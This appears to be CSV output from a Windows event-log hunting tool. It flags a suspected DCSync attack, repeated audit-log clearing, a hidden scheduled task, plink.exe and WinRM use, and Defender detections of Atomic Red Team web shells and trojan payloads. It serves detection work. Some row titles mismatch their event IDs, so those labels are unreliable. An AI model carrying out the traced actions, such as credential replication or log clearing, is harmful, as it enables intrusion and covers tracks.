O;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14674 + +",DC1.insecurebank.local,Security +Audit log cleared,1557594610.342445,2019-05-11T21:10:10.342445+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 18195 + + + + + Security + IEWIN7 + + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + IEWIN7 + 0x1371b + + +",IEWIN7,Security +Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242604 + + + + + Security + DC1.insecurebank.local + + + + + 9F3DCF8F-49DF-4DB9-AA5F-09B804ADDD96 + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14675 + +",DC1.insecurebank.local,Security +Dcsync Attack detected,1553549325.02663,2019-03-26T01:28:45.026630+04:00,,Threat,High,User Name ( bob ) is suspected doing dcsync attack ,5136," + + + + + 5136 + 0 + 0 + 14081 + 0 + 0x8020000000000000 + + + 198242603 + + + + + Security + DC1.insecurebank.local + + + + + 98E50F6A-AE61-4BFF-A9F0-CCFA5CCB555C + - + S-1-5-21-738609754-2819869699-4189121830-1108 + bob + insecurebank + 0x40f2719 + insecurebank.local + %%14676 + DC=insecurebank,DC=local + C6FAF700-BFE4-452A-A766-424F84C29583 + domainDNS + nTSecurityDescriptor + 2.5.5.15 + O:BAG:BAD:AI(OA;CIIO;RP;4c164200-20c0-11d0-a768-00aa006e0529;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;5f202010-79a5-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;bc0ac240-79a9-11d0-9020-00c04fc2d4cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;59ba2f42-79a2-11d0-9020-00c04fc2d3cf;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;RP;037088f8-0ae1-11d2-b422-00a0c968f939;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;3e0f7e18-2c7a-4c10-ba82-4d926db99a3e;;S-1-5-21-738609754-2819869699-4189121830-522)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-498)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;DD)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1107)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1120)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;S-1-5-21-738609754-2819869699-4189121830-1121)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a86-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967a9c-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;RP;b7c69e6d-2cc7-11d2-854e-00a0c983f608;bf967aba-0de6-11d0-a285-00aa003049e2;ED)(OA;CIIO;WP;ea1b7b93-5e48-46d5-bc6c-4df4fda78a35;bf967a86-0de6-11d0-a285-00aa003049e2;PS)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;BA)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ad-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;BA)(OA;;CR;e2a36dc9-ae17-47c3-b58b-be34c55ba633;;S-1-5-32-557)(OA;;RP;c7407360-20bf-11d0-a768-00aa006e0529;;RU)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;RU)(OA;CIIO;LCRPLORC;;4828cc14-1437-45bc-9b07-ad6f015e5f28;RU)(OA;CIIO;LCRPLORC;;bf967a9c-0de6-11d0-a285-00aa003049e2;RU)(OA;CIIO;LCRPLORC;;bf967aba-0de6-11d0-a285-00aa003049e2;RU)(OA;;CR;05c74c5e-4deb-43b4-bd9f-86664c2a7fd5;;AU)(OA;;CR;89e95b76-444d-4c62-991a-0facbeda640c;;ED)(OA;;CR;ccc2dc7d-a6ad-4a7a-8846-c04e3cc53501;;AU)(OA;;CR;280f369c-67c7-438e-ae98-1d46f3c6f541;;AU)(OA;;CR;1131f6aa-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ab-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ac-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;CR;1131f6ae-9c07-11d1-f79f-00c04fc2dcd2;;ED)(OA;;RP;b8119fd0-04f6-4762-ab7a-4986c76b3f9a;;AU)(OA;OICI;RPWP;3f78c3e5-f79a-46bd-a0b8-9d18116ddc79;;PS)(OA;CIIO;RPWPCR;91e647de-d96f-4b70-9557-d63ff4f3ccd8;;PS)(A;;CCLCSWRPWPLOCRRCWDWO;;;DA)(A;CI;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;S-1-5-21-738609754-2819869699-4189121830-519)(A;;RPRC;;;RU)(A;CI;LC;;;RU)(A;CI;CCLCSWRPWPLOCRSDRCWDWO;;;BA)(A;;RP;;;WD)(A;;LCRPLORC;;;ED)(A;;LCRPLORC;;;AU)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;SY)S:(OU;CISA;WP;f30e3bbe-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(OU;CISA;WP;f30e3bbf-9ff0-11d1-b603-0000f80367c1;bf967aa5-0de6-11d0-a285-00aa003049e2;WD)(AU;SA;CR;;;DU)(AU;SA;CR;;;BA)(AU;SA;WPWDWO;;;WD) + %%14674 + +",DC1.insecurebank.local,Security +Audit log cleared,1552907189.911579,2019-03-18T15:06:29.911579+04:00,,Audit,Critical,schedule task created by user,4698," + + + + + 4698 + 0 + 0 + 12804 + 0 + 0x8020000000000000 + + + 566836 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + S-1-5-21-1587066498-1489273250-1035260531-500 + Administrator + EXAMPLE + 0x17e2d2 + \CYAlyNSS + <?xml version="1.0" encoding="UTF-16"?> +<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task"> + <Triggers> + <CalendarTrigger> + <StartBoundary>2015-07-15T20:35:13.2757294</StartBoundary> + <Enabled>true</Enabled> + <ScheduleByDay> + <DaysInterval>1</DaysInterval> + </ScheduleByDay> + </CalendarTrigger> + </Triggers> + <Principals> + <Principal id="LocalSystem"> + <UserId>S-1-5-18</UserId> + <RunLevel>HighestAvailable</RunLevel> + <LogonType>InteractiveToken</LogonType> + </Principal> + </Principals> + <Settings> + <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy> + <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries> + <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries> + <AllowHardTerminate>true</AllowHardTerminate> + <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable> + <IdleSettings> + <StopOnIdleEnd>true</StopOnIdleEnd> + <RestartOnIdle>false</RestartOnIdle> + </IdleSettings> + <AllowStartOnDemand>true</AllowStartOnDemand> + <Enabled>true</Enabled> + <Hidden>true</Hidden> + <RunOnlyIfIdle>false</RunOnlyIfIdle> + <WakeToRun>false</WakeToRun> + <ExecutionTimeLimit>P3D</ExecutionTimeLimit> + <Priority>7</Priority> + </Settings> + <Actions Context="LocalSystem"> + <Exec> + <Command>cmd.exe</Command> + <Arguments>/C tasklist &gt; %windir%\Temp\CYAlyNSS.tmp 2&gt;&amp;1</Arguments> + </Exec> + </Actions> +</Task> + +",PC01.example.corp,Security +schedule task created,1552953724.335561,2019-03-19T04:02:04.335561+04:00,,Audit,High,Audit log cleared by user ( user01 ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 432901 + + + + + Security + PC01.example.corp + + + + + + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x18a7875 + + +",WIN-77LTAPHIQ1R.example.corp,Security +network share object was added,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,network share object was added,5142," + + + + + 5142 + 0 + 0 + 12808 + 0 + 0x8020000000000000 + + + 6273 + + + + + Security + PC04.example.corp + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + PC04 + 0x128a9 + \\*\PRINT + c:\windows\system32 + +",PC04.example.corp,Security +Audit log cleared,1552953724.179623,2019-03-19T04:02:04.179623+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 566821 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + + S-1-5-21-1587066498-1489273250-1035260531-500 + administrator + EXAMPLE + 0x4fd77 + + +",WIN-77LTAPHIQ1R.example.corp,Security +Audit log cleared,1552851030.324836,2019-03-17T23:30:30.324836+04:00,,Audit,Critical,Audit log cleared by user ( administrator ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 6272 + + + + + Security + PC04.example.corp + + + + + + S-1-5-21-3583694148-1414552638-2922671848-1000 + IEUser + PC04 + 0x128a9 + + +",PC04.example.corp,Security +Audit log cleared,1552951423.570212,2019-03-19T03:23:43.570212+04:00,,Audit,Critical,Audit log cleared by user ( administrator ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 565591 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + + S-1-5-21-1587066498-1489273250-1035260531-500 + administrator + EXAMPLE + 0x4fd77 + + +",WIN-77LTAPHIQ1R.example.corp,Security +Audit log cleared,1547969410.645116,2019-01-20T11:30:10.645116+04:00,,Audit,Critical,Audit log cleared by user ( Administrator ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 32950 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + + S-1-5-21-1587066498-1489273250-1035260531-500 + Administrator + EXAMPLE + 0x35312 + + +",WIN-77LTAPHIQ1R.example.corp,Security +Audit log cleared,1547967656.784849,2019-01-20T11:00:56.784849+04:00,,Audit,Critical,Audit log cleared by user ( Administrator ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 32853 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + + S-1-5-21-1587066498-1489273250-1035260531-500 + Administrator + EXAMPLE + 0x35312 + + +",WIN-77LTAPHIQ1R.example.corp,Security +Audit log cleared,1600193079.987052,2020-09-15T22:04:39.987052+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 161471 + + + + + Security + MSEDGEWIN10 + + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x52a7d + + +",MSEDGEWIN10,Security +Audit log cleared,1552908425.42562,2019-03-18T15:27:05.425620+04:00,,Audit,Critical,Audit log cleared by user ( user01 ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 433307 + + + + + Security + PC01.example.corp + + + + + + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x18a7875 + + +",PC01.example.corp,Security +Suspicious Command or process found in the log,1550081008.338519,2019-02-13T22:03:28.338519+04:00,,Threat,Critical,Found a log contain suspicious command or process ( plink.exe),4688," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227714 + + + + + Security + PC01.example.corp + + + + + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x2ed80 + 0xcfc + C:\Users\user01\Desktop\plink.exe + %%1936 + 0xe60 + + +",PC01.example.corp,Security +Process running in Unusual location,1550081008.338519,2019-02-13T22:03:28.338519+04:00,,Threat,High,"User Name : ( user01 ) with process : ( C:\Users\user01\Desktop\plink.exe ) run from Unusual location , check the number and date of execution in process execution report",4688," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227714 + + + + + Security + PC01.example.corp + + + + + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x2ed80 + 0xcfc + C:\Users\user01\Desktop\plink.exe + %%1936 + 0xe60 + + +",PC01.example.corp,Security +Audit log cleared,1550080907.51234,2019-02-13T22:01:47.512340+04:00,,Audit,Critical,Audit log cleared by user ( admin01 ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 227693 + + + + + Security + PC01.example.corp + + + + + + S-1-5-21-1587066498-1489273250-1035260531-1108 + admin01 + EXAMPLE + 0xaf855 + + +",PC01.example.corp,Security +connection is initiated using WinRM to this machine - Powershell remoting,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,User (S-1-5-21-738609754-2819869699-4189121830-500) Connected to this machine using WinRM - powershell remote - check eventlog viewer,91," + + + + + 91 + 0 + 4 + 9 + 0 + 0x4000000000000004 + + + 508 + + + + + Microsoft-Windows-WinRM/Operational + DC1.insecurebank.local + + + + + 15005 + shellId + 68007400740070003A002F002F0073006300680065006D00610073002E006D006900630072006F0073006F00660074002E0063006F006D002F007700620065006D002F00770073006D0061006E002F0031002F00770069006E0064006F00770073002F007300680065006C006C002F0063006D0064000000 + +",DC1.insecurebank.local,Microsoft-Windows-WinRM/Operational +Windows Defender took action against Malware,1563483223.034598,2019-07-19T00:53:43.034598+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Trojan:XML/Exeselrun.gen!A ) , Action ( 6 ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117," + + + + + 1117 + 0 + 4 + 0 + 0 + 0x8000000000000000 + + + 106 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {8791B1FB-0FE7-412E-B084-524CB5A221F3} + 2019-07-18T20:40:13.775Z + + + 2147735426 + Trojan:XML/Exeselrun.gen!A + 5 + Severe + 8 + Trojan + https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:XML/Exeselrun.gen!A&threatid=2147735426&enterprise=0 + 5 + + 2 + 3 + %%818 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl + 1 + %%845 + 1 + %%813 + 2 + %%823 + 0 + 6 + %%811 + + 0x80508023 + The program could not find the malware and other potentially unwanted software on this device. + + 0 + 0 + No additional actions required + NT AUTHORITY\SYSTEM + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 + AM: 1.1.16100.4, NIS: 0.0.0.0 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational +Windows Defender took action against Malware,1563483211.952568,2019-07-19T00:53:31.952568+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( High ) , Name ( HackTool:JS/Jsprat ) , Action ( 2 ) , Catgeory ( Tool ) , Path ( containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117," + + + + + 1117 + 0 + 4 + 0 + 0 + 0x8000000000000000 + + + 105 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {37522D93-EBDD-4A5B-93B6-E984C9E3FD38} + 2019-07-18T20:40:16.697Z + + + 2147708292 + HackTool:JS/Jsprat + 4 + High + 34 + Tool + https://go.microsoft.com/fwlink/?linkid=37020&name=HackTool:JS/Jsprat&threatid=2147708292&enterprise=0 + 3 + + 2 + 3 + %%818 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) + 1 + %%845 + 1 + %%813 + 8 + %%862 + 0 + 2 + %%809 + + 0x00000000 + The operation completed successfully. + + 0 + 0 + No additional actions required + NT AUTHORITY\SYSTEM + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 + AM: 1.1.16100.4, NIS: 0.0.0.0 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational +Windows Defender took action against Malware,1563483211.905406,2019-07-19T00:53:31.905406+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Trojan:Win32/Sehyioa.A!cl ) , Action ( 2 ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117," + + + + + 1117 + 0 + 4 + 0 + 0 + 0x8000000000000000 + + + 104 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {F6272F78-9FD1-47D2-B206-89E0F0DCBDB9} + 2019-07-18T20:41:40.357Z + + + 2147726426 + Trojan:Win32/Sehyioa.A!cl + 5 + Severe + 8 + Trojan + https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Sehyioa.A!cl&threatid=2147726426&enterprise=0 + 3 + + 2 + 3 + %%818 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll + 1 + %%845 + 1 + %%813 + 8 + %%862 + 0 + 2 + %%809 + + 0x00000000 + The operation completed successfully. + + 0 + 0 + No additional actions required + NT AUTHORITY\SYSTEM + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 + AM: 1.1.16100.4, NIS: 0.0.0.0 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational +Windows Defender took action against Malware,1563483211.90261,2019-07-19T00:53:31.902610+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Backdoor:ASP/Ace.T ) , Action ( 2 ) , Catgeory ( Backdoor ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117," + + + + + 1117 + 0 + 4 + 0 + 0 + 0x8000000000000000 + + + 103 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {CEF4D8DA-15D6-4667-8E4C-12D19AB4EFED} + 2019-07-18T20:40:18.385Z + + + 2147683177 + Backdoor:ASP/Ace.T + 5 + Severe + 6 + Backdoor + https://go.microsoft.com/fwlink/?linkid=37020&name=Backdoor:ASP/Ace.T&threatid=2147683177&enterprise=0 + 3 + + 2 + 3 + %%818 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx + 1 + %%845 + 1 + %%813 + 0 + %%822 + 0 + 2 + %%809 + + 0x00000000 + The operation completed successfully. + + 0 + 0 + No additional actions required + NT AUTHORITY\SYSTEM + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 + AM: 1.1.16100.4, NIS: 0.0.0.0 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational +Windows Defender Found Malware,1563483211.900809,2019-07-19T00:53:31.900809+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( High ) , Name ( HackTool:JS/Jsprat ) , Catgeory ( Tool ) , Path ( containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); 